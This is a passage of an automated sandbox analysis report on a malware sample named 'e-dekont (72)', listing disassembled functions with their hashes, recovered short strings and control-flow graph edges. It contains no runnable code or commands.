                                                                • Opcode Fuzzy Hash: d05c5ed885d477157585628488ba39d742ca923ed1e0595688dbe09574b0d336
                                                                • Instruction Fuzzy Hash: 16C139B4D02218CFEBA4EFA5C844BADBBF2BF49304F5080AAD409A7795CB355985CF51
                                                                Function 06FAEFB0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Dqq
                                                                • API String ID: 0-373195589
                                                                • Opcode ID: 856938abace47d41f9472476f7469aef1dbc91e15930226a6ad9ba6a0a0acf72
                                                                • Instruction ID: c62834580d96b245eb78509a4a240432676fb998556598516cf3d20a5448ae98
                                                                • Opcode Fuzzy Hash: 856938abace47d41f9472476f7469aef1dbc91e15930226a6ad9ba6a0a0acf72
                                                                • Instruction Fuzzy Hash: 0BD1B3B4E01218CFDB54DFA9D994A9DBBF2BF89300F1081A9D409AB369DB319D81CF50
                                                                Function 06AE8F40 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 9f9801fdd1eb9dcdb2037a272d000188325b70a2cd829c1e1f491972be0074cf
                                                                • Instruction ID: 20f0984a8ec6e79088b6edc339f117451b1be09c3524061fdb54e3092ea2aa79
                                                                • Opcode Fuzzy Hash: 9f9801fdd1eb9dcdb2037a272d000188325b70a2cd829c1e1f491972be0074cf
                                                                • Instruction Fuzzy Hash: BEC10474E01218CFEB94DFA9D984B9EBBF6BF49300F1081A9D409AB355DB749981CF40
                                                                Function 06AE8F50 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 514d62a89a05cabc9647ce36e2cddb87d127cdea2f28d92e6f30e19459819848
                                                                • Instruction ID: 3943954c19b0d5b38d99f24f94a9c846283ef4f937fd5a896a0d7a2e5ded1501
                                                                • Opcode Fuzzy Hash: 514d62a89a05cabc9647ce36e2cddb87d127cdea2f28d92e6f30e19459819848
                                                                • Instruction Fuzzy Hash: C3B1E570E05218CFEB94DFA9D984B9EBBF6BF49300F1090A9D409EB255DB749985CF40
                                                                Function 06AD5DE8 Relevance: .5, Instructions: 453COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8712bf0567d07dbb4b459c05b9d44b6a4f541582fbb96a3d39dc916a27a72b3e
                                                                • Instruction ID: e6d5c93252990441f9e89eed61ed244a967a04b72e826c04a9f4b4d28bb61ced
                                                                • Opcode Fuzzy Hash: 8712bf0567d07dbb4b459c05b9d44b6a4f541582fbb96a3d39dc916a27a72b3e
                                                                • Instruction Fuzzy Hash: 4B025AB0B016168FCB89DF69C49866EFBF2FF88300F248529D556DB391CB30A955CB91
                                                                Function 02E11D97 Relevance: .2, Instructions: 226COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0954dc9595098b811e3129fc7e8d861b829fa9b720475c3a7bb330e5fdb44560
                                                                • Instruction ID: 78fe17572f9d0738750762d36a933f740e1e65ff80e0b3bbd78abbe02bbc1252
                                                                • Opcode Fuzzy Hash: 0954dc9595098b811e3129fc7e8d861b829fa9b720475c3a7bb330e5fdb44560
                                                                • Instruction Fuzzy Hash: DB91BC34A84118CFDB14DF69D458BA977F3FB89305F24D57AE6099B3A8CB719881CB40
                                                                Function 02E119A0 Relevance: .2, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6c2616c1f17ed36dcc0c756faa508a58a783d80b1e271f1798db8bd4f86fadb
                                                                • Instruction ID: d6cd95857113268f8beb96bbfea85e880f6f9099b6660514f7a6e0409cebc345
                                                                • Opcode Fuzzy Hash: e6c2616c1f17ed36dcc0c756faa508a58a783d80b1e271f1798db8bd4f86fadb
                                                                • Instruction Fuzzy Hash: DD91AC34A44244CFDB05CF68C480BE9BBB2EB89314F58D2B6D10AAF299D7349C95CB60
                                                                Function 02E11E39 Relevance: .2, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bda4c2039818b06fedf1ed9e7d481173014f1cfea1067720c4fc52a0cf74a9c
                                                                • Instruction ID: 3453d050c80f6f1969a37f404ceb628c1638e1d8e58cb5c1fa7463534de06aa0
                                                                • Opcode Fuzzy Hash: 5bda4c2039818b06fedf1ed9e7d481173014f1cfea1067720c4fc52a0cf74a9c
                                                                • Instruction Fuzzy Hash: E7818D34A84118CFDB14DF69D458BA977F3FB89305F68E579E6099B3A8CB719881CB00
                                                                Function 06C3C010 Relevance: 4.2, Strings: 3, Instructions: 482COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 819 6c3c010-6c3c038 821 6c3c086-6c3c094 819->821 822 6c3c03a-6c3c081 819->822 823 6c3c0a3 821->823 824 6c3c096-6c3c0a1 call 6c39b30 821->824 871 6c3c4dd-6c3c4e4 822->871 826 6c3c0a5-6c3c0ac 823->826 824->826 829 6c3c0b2-6c3c0b6 826->829 830 6c3c195-6c3c199 826->830 833 6c3c4e5-6c3c50d 829->833 834 6c3c0bc-6c3c0c0 829->834 831 6c3c19b-6c3c1aa call 6c37d50 830->831 832 6c3c1ef-6c3c1f9 830->832 849 6c3c1ae-6c3c1b3 831->849 836 6c3c232-6c3c258 832->836 837 6c3c1fb-6c3c20a call 6c37428 832->837 846 6c3c514-6c3c53e 833->846 839 6c3c0d2-6c3c130 call 6c39870 call 6c3a2d8 834->839 840 6c3c0c2-6c3c0cc 834->840 866 6c3c265 836->866 867 6c3c25a-6c3c263 836->867 853 6c3c210-6c3c22d 837->853 854 6c3c546-6c3c55c 837->854 879 6c3c5a3-6c3c5cd 839->879 880 6c3c136-6c3c190 839->880 840->839 840->846 846->854 855 6c3c1b5-6c3c1ea call 6c3bad8 849->855 856 6c3c1ac 849->856 853->871 881 6c3c564-6c3c59c 854->881 855->871 856->849 869 6c3c267-6c3c28f 866->869 867->869 885 6c3c360-6c3c364 869->885 886 6c3c295-6c3c2ae 869->886 891 6c3c5d7-6c3c5dd 879->891 892 6c3c5cf-6c3c5d5 879->892 880->871 881->879 889 6c3c366-6c3c37f 885->889 890 6c3c3de-6c3c3e8 885->890 886->885 912 6c3c2b4-6c3c2c3 call 6c36e50 886->912 889->890 917 6c3c381-6c3c390 call 6c36e50 889->917 894 6c3c445-6c3c44e 890->894 895 6c3c3ea-6c3c3f4 890->895 892->891 898 6c3c5de-6c3c61b 892->898 900 6c3c450-6c3c47e call 6c39080 call 6c390a0 894->900 901 6c3c486-6c3c4d3 894->901 910 6c3c3f6-6c3c3f8 895->910 911 6c3c3fa-6c3c40c 895->911 900->901 922 6c3c4db 901->922 918 6c3c40e-6c3c410 910->918 911->918 933 6c3c2c5-6c3c2cb 912->933 934 6c3c2db-6c3c2f0 912->934 939 6c3c392-6c3c398 917->939 940 6c3c3a8-6c3c3b3 917->940 920 6c3c412-6c3c416 918->920 921 6c3c43e-6c3c443 918->921 929 6c3c434-6c3c439 call 6c35c50 920->929 930 6c3c418-6c3c431 920->930 921->894 921->895 922->871 929->921 930->929 941 6c3c2cf-6c3c2d1 933->941 942 6c3c2cd 933->942 936 6c3c2f2-6c3c31e call 6c381d0 934->936 937 6c3c324-6c3c32d 934->937 936->881 936->937 937->879 947 6c3c333-6c3c35a 937->947 948 6c3c39a 939->948 949 6c3c39c-6c3c39e 939->949 940->879 950 6c3c3b9-6c3c3dc 940->950 941->934 942->934 947->885 947->912 948->940 949->940 950->890 950->917
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hnq$Hnq$Hnq
                                                                • API String ID: 0-1699790779
                                                                • Opcode ID: 7e973f5c3624c6a9419771c0b7683bd91d5816441d7a3ac60f64107620c08ae6
                                                                • Instruction ID: a8c4368123c6a264392b5a1ec429aa2e5bf83c9703a8ff0351e9598e6a4c2a76
                                                                • Opcode Fuzzy Hash: 7e973f5c3624c6a9419771c0b7683bd91d5816441d7a3ac60f64107620c08ae6
                                                                • Instruction Fuzzy Hash: 18127E70A002158FCB65DFA5C994AAEBBF2FF88300F14852DD506AB365DB31ED45CB91
                                                                Function 06C3DCC8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 961 6c3dcc8-6c3dd05 call 6c3e27a 963 6c3dd27-6c3dd3d call 6c3dad0 961->963 964 6c3dd07-6c3dd0a 961->964 970 6c3e0b3-6c3e0c7 963->970 971 6c3dd43-6c3dd4f 963->971 1079 6c3dd0c call 6c3e5d2 964->1079 1080 6c3dd0c call 6c3e638 964->1080 1081 6c3dd0c call 6c3e758 964->1081 966 6c3dd12-6c3dd14 966->963 968 6c3dd16-6c3dd1e 966->968 968->963 980 6c3e107-6c3e110 970->980 972 6c3de80-6c3de87 971->972 973 6c3dd55-6c3dd58 971->973 975 6c3dfb6-6c3dff0 call 6c3d4d8 972->975 976 6c3de8d-6c3de96 972->976 977 6c3dd5b-6c3dd64 973->977 1074 6c3dff3 call 6ad0081 975->1074 1075 6c3dff3 call 6ad0090 975->1075 976->975 981 6c3de9c-6c3dfa8 call 6c3d4d8 call 6c3da68 call 6c3d4d8 976->981 978 6c3dd6a-6c3dd7e 977->978 979 6c3e1a8 977->979 995 6c3de70-6c3de7a 978->995 996 6c3dd84-6c3de19 call 6c3dad0 * 2 call 6c3d4d8 call 6c3da68 call 6c3db10 call 6c3dbb8 call 6c3dc20 978->996 986 6c3e1ad-6c3e1b1 979->986 983 6c3e112-6c3e119 980->983 984 6c3e0d5-6c3e0de 980->984 1072 6c3dfb3 981->1072 1073 6c3dfaa 981->1073 990 6c3e167-6c3e16e 983->990 991 6c3e11b-6c3e15e call 6c3d4d8 983->991 984->979 988 6c3e0e4-6c3e0f6 984->988 992 6c3e1b3 986->992 993 6c3e1bc 986->993 1007 6c3e106 988->1007 1008 6c3e0f8-6c3e0fd 988->1008 997 6c3e193-6c3e1a6 990->997 998 6c3e170-6c3e180 990->998 991->990 992->993 1005 6c3e1bd 993->1005 995->972 995->977 1051 6c3de1b-6c3de33 call 6c3dbb8 call 6c3d4d8 call 6c3d788 996->1051 1052 6c3de38-6c3de6b call 6c3dc20 996->1052 997->986 998->997 1011 6c3e182-6c3e18a 998->1011 1005->1005 1007->980 1077 6c3e100 call 6ad0820 1008->1077 1078 6c3e100 call 6ad0830 1008->1078 1011->997 1020 6c3dff9-6c3e0aa call 6c3d4d8 1020->970 1051->1052 1052->995 1072->975 1073->1072 1074->1020 1075->1020 1077->1007 1078->1007 1079->966 1080->966 1081->966
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq$4'jq
                                                                • API String ID: 0-3078559419
                                                                • Opcode ID: 9db85365575e6f877d635983ca1fb6a0b804fbde5a9dcea79ae75db3a1c8f0f3
                                                                • Instruction ID: f3b2703c05126049be0bea8dfe4a6d755db0acf139605a9dc81ef5db87be262d
                                                                • Opcode Fuzzy Hash: 9db85365575e6f877d635983ca1fb6a0b804fbde5a9dcea79ae75db3a1c8f0f3
                                                                • Instruction Fuzzy Hash: 9EF1C834B10218DFDB44DFA4D994AADB7B2FF89300F118159E906AB3A5DB70ED42CB50
                                                                Function 06AA1E48 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 08a0840821c578f8fce00e54c334ab371b060edacf4071e79f03d32d96393585
                                                                • Instruction ID: e79a7984020de4767a5e18e4365cc34511aaa5a33d7b7c6d16f577bf3efcb23b
                                                                • Opcode Fuzzy Hash: 08a0840821c578f8fce00e54c334ab371b060edacf4071e79f03d32d96393585
                                                                • Instruction Fuzzy Hash: F142D174E04209CFDF94EB95D558AAEBBB2FF49301F14801AD912AB394C7385E56CFA0
                                                                Function 06C3851A Relevance: 3.0, Strings: 2, Instructions: 523COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1589 6c3851a-6c3854e 1590 6c38550-6c3855d 1589->1590 1591 6c3855f-6c38568 1589->1591 1590->1591 1592 6c3856b-6c38578 1590->1592 1593 6c38583 1592->1593 1594 6c3857a-6c38581 1592->1594 1595 6c3858a-6c385b4 1593->1595 1594->1595 1596 6c385b6 1595->1596 1597 6c385bd-6c385d0 call 6c38208 1595->1597 1596->1597 1600 6c385d6-6c385e9 1597->1600 1601 6c38714-6c3871b 1597->1601 1611 6c385f7-6c38611 1600->1611 1612 6c385eb-6c385f2 1600->1612 1602 6c38721-6c38736 1601->1602 1603 6c389b5-6c389bc 1601->1603 1616 6c38756-6c3875c 1602->1616 1617 6c38738-6c3873a 1602->1617 1604 6c38a2b-6c38a32 1603->1604 1605 6c389be-6c389c7 1603->1605 1607 6c38a38-6c38a41 1604->1607 1608 6c38ace-6c38ad5 1604->1608 1605->1604 1610 6c389c9-6c389dc 1605->1610 1607->1608 1613 6c38a47-6c38a5a 1607->1613 1614 6c38af1-6c38af7 1608->1614 1615 6c38ad7-6c38ae8 1608->1615 1610->1604 1629 6c389de-6c38a23 call 6c35680 1610->1629 1633 6c38613-6c38616 1611->1633 1634 6c38618-6c38625 1611->1634 1618 6c3870d 1612->1618 1637 6c38a6d-6c38a71 1613->1637 1638 6c38a5c-6c38a6b 1613->1638 1621 6c38b09-6c38b12 1614->1621 1622 6c38af9-6c38aff 1614->1622 1615->1614 1639 6c38aea 1615->1639 1623 6c38762-6c38764 1616->1623 1624 6c38824-6c38828 1616->1624 1617->1616 1619 6c3873c-6c38753 1617->1619 1618->1601 1619->1616 1630 6c38b01-6c38b07 1622->1630 1631 6c38b15-6c38b65 1622->1631 1623->1624 1632 6c3876a-6c38799 call 6c35680 1623->1632 1624->1603 1626 6c3882e-6c38830 1624->1626 1626->1603 1636 6c38836-6c3883f 1626->1636 1629->1604 1670 6c38a25-6c38a28 1629->1670 1630->1621 1630->1631 1690 6c38b6d-6c38b8a 1631->1690 1665 6c3879e-6c387eb call 6c35680 * 3 1632->1665 1635 6c38627-6c3863b 1633->1635 1634->1635 1635->1618 1668 6c38641-6c38695 1635->1668 1643 6c38992-6c38998 1636->1643 1644 6c38a73-6c38a75 1637->1644 1645 6c38a91-6c38a93 1637->1645 1638->1637 1639->1614 1648 6c389ab 1643->1648 1649 6c3899a-6c389a9 1643->1649 1644->1645 1652 6c38a77-6c38a8e 1644->1652 1645->1608 1653 6c38a95-6c38a9b 1645->1653 1657 6c389ad-6c389af 1648->1657 1649->1657 1652->1645 1653->1608 1654 6c38a9d-6c38acb 1653->1654 1654->1608 1657->1603 1660 6c38844-6c38852 call 6c36e50 1657->1660 1676 6c38854-6c3885a 1660->1676 1677 6c3886a-6c38884 1660->1677 1701 6c38802-6c38821 call 6c35680 1665->1701 1702 6c387ed-6c387ff call 6c35680 1665->1702 1708 6c386a3-6c386a7 1668->1708 1709 6c38697-6c38699 1668->1709 1670->1604 1680 6c3885e-6c38860 1676->1680 1681 6c3885c 1676->1681 1677->1643 1686 6c3888a-6c3888e 1677->1686 1680->1677 1681->1677 1687 6c38890-6c38899 1686->1687 1688 6c388af 1686->1688 1692 6c388a0-6c388a3 1687->1692 1693 6c3889b-6c3889e 1687->1693 1694 6c388b2-6c388cc 1688->1694 1712 6c38b98 1690->1712 1713 6c38b8c-6c38b96 1690->1713 1697 6c388ad 1692->1697 1693->1697 1694->1643 1716 6c388d2-6c38953 call 6c35680 * 4 1694->1716 1697->1694 1701->1624 1702->1701 1708->1618 1715 6c386a9-6c386c1 1708->1715 1709->1708 1714 6c38b9d-6c38b9f 1712->1714 1713->1714 1717 6c38ba1-6c38ba4 1714->1717 1718 6c38ba6-6c38bab 1714->1718 1715->1618 1722 6c386c3-6c386cf 1715->1722 1742 6c38955-6c38967 call 6c35680 1716->1742 1743 6c3896a-6c38990 call 6c35680 1716->1743 1719 6c38bb1-6c38bde 1717->1719 1718->1719 1724 6c386d1-6c386d4 1722->1724 1725 6c386de-6c386e4 1722->1725 1724->1725 1728 6c386e6-6c386e9 1725->1728 1729 6c386ec-6c386f5 1725->1729 1728->1729 1732 6c386f7-6c386fa 1729->1732 1733 6c38704-6c3870a 1729->1733 1732->1733 1733->1618 1742->1743 1743->1603 1743->1643
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $jq$$jq
                                                                • API String ID: 0-3720491408
                                                                • Opcode ID: 99a05cddbbd08ca81fd60f4fd7d7661965f3acba51df967ae7139b8f783220ef
                                                                • Instruction ID: 4628e6313ec9038c631bffaff9bdb42fdf9097b32280d93c2f91df9386059d4c
                                                                • Opcode Fuzzy Hash: 99a05cddbbd08ca81fd60f4fd7d7661965f3acba51df967ae7139b8f783220ef
                                                                • Instruction Fuzzy Hash: 61228D34E012299FCF55DFA5D850AAEBBB2FF48700F148429F811A73A5DB349A45CFA1
                                                                Function 06AA2970 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1748 6aa2970-6aa2998 1749 6aa299a 1748->1749 1750 6aa299f-6aa29c8 1748->1750 1749->1750 1751 6aa29ca-6aa29d3 1750->1751 1752 6aa29e9 1750->1752 1753 6aa29da-6aa29dd 1751->1753 1754 6aa29d5-6aa29d8 1751->1754 1755 6aa29ec-6aa29f0 1752->1755 1756 6aa29e7 1753->1756 1754->1756 1757 6aa2da7-6aa2dbe 1755->1757 1756->1755 1759 6aa2dc4-6aa2dc8 1757->1759 1760 6aa29f5-6aa29f9 1757->1760 1761 6aa2dca-6aa2dfa 1759->1761 1762 6aa2dfd-6aa2e01 1759->1762 1763 6aa29fb-6aa2a58 1760->1763 1764 6aa29fe-6aa2a02 1760->1764 1761->1762 1768 6aa2e22 1762->1768 1769 6aa2e03-6aa2e0c 1762->1769 1772 6aa2a5a-6aa2acb 1763->1772 1773 6aa2a5d-6aa2a61 1763->1773 1766 6aa2a2b-6aa2a4f 1764->1766 1767 6aa2a04-6aa2a28 1764->1767 1766->1757 1767->1766 1770 6aa2e25-6aa2e2b 1768->1770 1774 6aa2e0e-6aa2e11 1769->1774 1775 6aa2e13-6aa2e16 1769->1775 1783 6aa2acd-6aa2b2a 1772->1783 1784 6aa2ad0-6aa2ad4 1772->1784 1778 6aa2a8a-6aa2ab1 1773->1778 1779 6aa2a63-6aa2a87 1773->1779 1781 6aa2e20 1774->1781 1775->1781 1803 6aa2ab3-6aa2ab9 1778->1803 1804 6aa2ac1-6aa2ac2 1778->1804 1779->1778 1781->1770 1792 6aa2b2f-6aa2b33 1783->1792 1793 6aa2b2c-6aa2b88 1783->1793 1788 6aa2afd-6aa2b21 1784->1788 1789 6aa2ad6-6aa2afa 1784->1789 1788->1757 1789->1788 1799 6aa2b5c-6aa2b76 1792->1799 1800 6aa2b35-6aa2b59 1792->1800 1805 6aa2b8a-6aa2bec 1793->1805 1806 6aa2b8d-6aa2b91 1793->1806 1819 6aa2b7e-6aa2b7f 1799->1819 1800->1799 1803->1804 1804->1757 1815 6aa2bee-6aa2c50 1805->1815 1816 6aa2bf1-6aa2bf5 1805->1816 1812 6aa2bba-6aa2bd2 1806->1812 1813 6aa2b93-6aa2bb7 1806->1813 1825 6aa2be2-6aa2be3 1812->1825 1826 6aa2bd4-6aa2bda 1812->1826 1813->1812 1827 6aa2c52-6aa2cb4 1815->1827 1828 6aa2c55-6aa2c59 1815->1828 1821 6aa2c1e-6aa2c36 1816->1821 1822 6aa2bf7-6aa2c1b 1816->1822 1819->1757 1836 6aa2c38-6aa2c3e 1821->1836 1837 6aa2c46-6aa2c47 1821->1837 1822->1821 1825->1757 1826->1825 1838 6aa2cb9-6aa2cbd 1827->1838 1839 6aa2cb6-6aa2d18 1827->1839 1832 6aa2c5b-6aa2c7f 1828->1832 1833 6aa2c82-6aa2c9a 1828->1833 1832->1833 1847 6aa2caa-6aa2cab 1833->1847 1848 6aa2c9c-6aa2ca2 1833->1848 1836->1837 1837->1757 1843 6aa2cbf-6aa2ce3 1838->1843 1844 6aa2ce6-6aa2cfe 1838->1844 1849 6aa2d1a-6aa2d73 1839->1849 1850 6aa2d1d-6aa2d21 1839->1850 1843->1844 1858 6aa2d0e-6aa2d0f 1844->1858 1859 6aa2d00-6aa2d06 1844->1859 1847->1757 1848->1847 1860 6aa2d9c-6aa2d9f 1849->1860 1861 6aa2d75-6aa2d99 1849->1861 1854 6aa2d4a-6aa2d6d 1850->1854 1855 6aa2d23-6aa2d47 1850->1855 1854->1757 1855->1854 1858->1757 1859->1858 1860->1757 1861->1860
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2051997153.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6aa0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 2c31faf41308093f504aeb0ea39323690ab54db2e4103757ffd92b0b530fce1f
                                                                • Instruction ID: 61e04d1b0232f6e490b709e47357a68d9f8b1aab76525f13883ffb6b4ca04dc1
                                                                • Opcode Fuzzy Hash: 2c31faf41308093f504aeb0ea39323690ab54db2e4103757ffd92b0b530fce1f
                                                                • Instruction Fuzzy Hash: 41F1C374D11308DFDBA8EFA4E5986ACBBB2FF49311F24416AE416AB354CB345981CF50
                                                                Function 06C39870 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1873 6c39870-6c3988a 1874 6c39896-6c398a2 1873->1874 1875 6c3988c-6c39893 1873->1875 1877 6c398a4-6c398b1 1874->1877 1878 6c398fe-6c39901 1874->1878 1885 6c398b7-6c398e7 1877->1885 1886 6c39acf 1877->1886 1879 6c39903-6c39905 1878->1879 1880 6c39914-6c39917 1878->1880 1884 6c3990d 1879->1884 1882 6c39919-6c39937 1880->1882 1883 6c3993d-6c39940 1880->1883 1882->1883 1893 6c39b0e-6c39b20 1882->1893 1887 6c39946-6c3994c 1883->1887 1888 6c39ac5-6c39acc 1883->1888 1884->1880 1918 6c398f4-6c398f7 1885->1918 1919 6c398e9-6c398f2 1885->1919 1890 6c39ad2-6c39ad3 1886->1890 1887->1888 1891 6c39952-6c3995b 1887->1891 1894 6c39ad4-6c39b07 1890->1894 1895 6c39abd-6c39ac3 1890->1895 1900 6c39993-6c39999 1891->1900 1901 6c3995d-6c3996c 1891->1901 1893->1890 1909 6c39b22-6c39b59 1893->1909 1894->1893 1895->1888 1902 6c39aa4-6c39aaa 1900->1902 1903 6c3999f-6c399a8 1900->1903 1901->1900 1911 6c3996e-6c39987 1901->1911 1902->1888 1904 6c39aac-6c39abc 1902->1904 1903->1902 1914 6c399ae-6c399ba 1903->1914 1904->1888 1904->1895 1924 6c39b92-6c39b94 1909->1924 1925 6c39b5b-6c39b68 1909->1925 1911->1900 1920 6c39989-6c3998c 1911->1920 1926 6c399c0-6c399e8 1914->1926 1927 6c39a58-6c39a9c 1914->1927 1918->1878 1919->1878 1920->1900 1928 6c39fdf-6c39fe6 1924->1928 1925->1924 1932 6c39b6a-6c39b90 1925->1932 1926->1927 1938 6c399ea-6c39a27 1926->1938 1927->1902 1932->1924 1944 6c39b99-6c39bcd 1932->1944 1938->1927 1951 6c39a29-6c39a56 1938->1951 1952 6c39bd3-6c39bdc 1944->1952 1953 6c39c70-6c39c7f 1944->1953 1951->1902 1954 6c39be2-6c39bf5 1952->1954 1955 6c39fe7-6c39ff2 1952->1955 1958 6c39c81-6c39c97 1953->1958 1959 6c39cbe 1953->1959 1964 6c39bf7-6c39c10 1954->1964 1965 6c39c5e-6c39c6a 1954->1965 1970 6c39cb7-6c39cbc 1958->1970 1971 6c39c99-6c39cb5 1958->1971 1963 6c39cc0-6c39cc5 1959->1963 1968 6c39cc7-6c39ce8 1963->1968 1969 6c39d08-6c39d24 1963->1969 1964->1965 1984 6c39c12-6c39c20 1964->1984 1965->1952 1965->1953 1968->1969 1988 6c39cea 1968->1988 1977 6c39d2a-6c39d33 1969->1977 1978 6c39dec-6c39df5 1969->1978 1970->1963 1971->1963 1977->1955 1982 6c39d39-6c39d56 1977->1982 1980 6c39dfb 1978->1980 1981 6c39fdd 1978->1981 1985 6c39e02-6c39e04 1980->1985 1986 6c39e66-6c39e74 call 6c36e50 1980->1986 1987 6c39e09-6c39e17 call 6c36e50 1980->1987 1981->1928 2010 6c39dda-6c39de6 1982->2010 2011 6c39d5c-6c39d72 1982->2011 1984->1965 1994 6c39c22-6c39c26 1984->1994 1985->1928 2001 6c39e76-6c39e7c 1986->2001 2002 6c39e8c-6c39e8f 1986->2002 1999 6c39e19-6c39e1f 1987->1999 2000 6c39e2f-6c39e32 1987->2000 1989 6c39ced-6c39d06 1988->1989 1989->1969 1994->1955 1998 6c39c2c-6c39c45 1994->1998 1998->1965 2036 6c39c47-6c39c5b call 6c35c80 1998->2036 2006 6c39e23-6c39e25 1999->2006 2007 6c39e21 1999->2007 2012 6c39e34-6c39e36 2000->2012 2013 6c39e3b-6c39e49 call 6c36e50 2000->2013 2008 6c39e80-6c39e82 2001->2008 2009 6c39e7e 2001->2009 2004 6c39f20-6c39f31 call 6c36e50 2002->2004 2005 6c39e95-6c39ea3 call 6c36e50 2002->2005 2027 6c39f33-6c39f39 2004->2027 2028 6c39f49-6c39f4c 2004->2028 2022 6c39ea5-6c39eab 2005->2022 2023 6c39ebb-6c39ece call 6c36e50 2005->2023 2006->2000 2007->2000 2008->2002 2009->2002 2010->1977 2010->1978 2011->2010 2039 6c39d74-6c39d82 2011->2039 2012->1928 2024 6c39e61 2013->2024 2025 6c39e4b-6c39e51 2013->2025 2031 6c39eaf-6c39eb1 2022->2031 2032 6c39ead 2022->2032 2044 6c39ed0-6c39ed6 2023->2044 2045 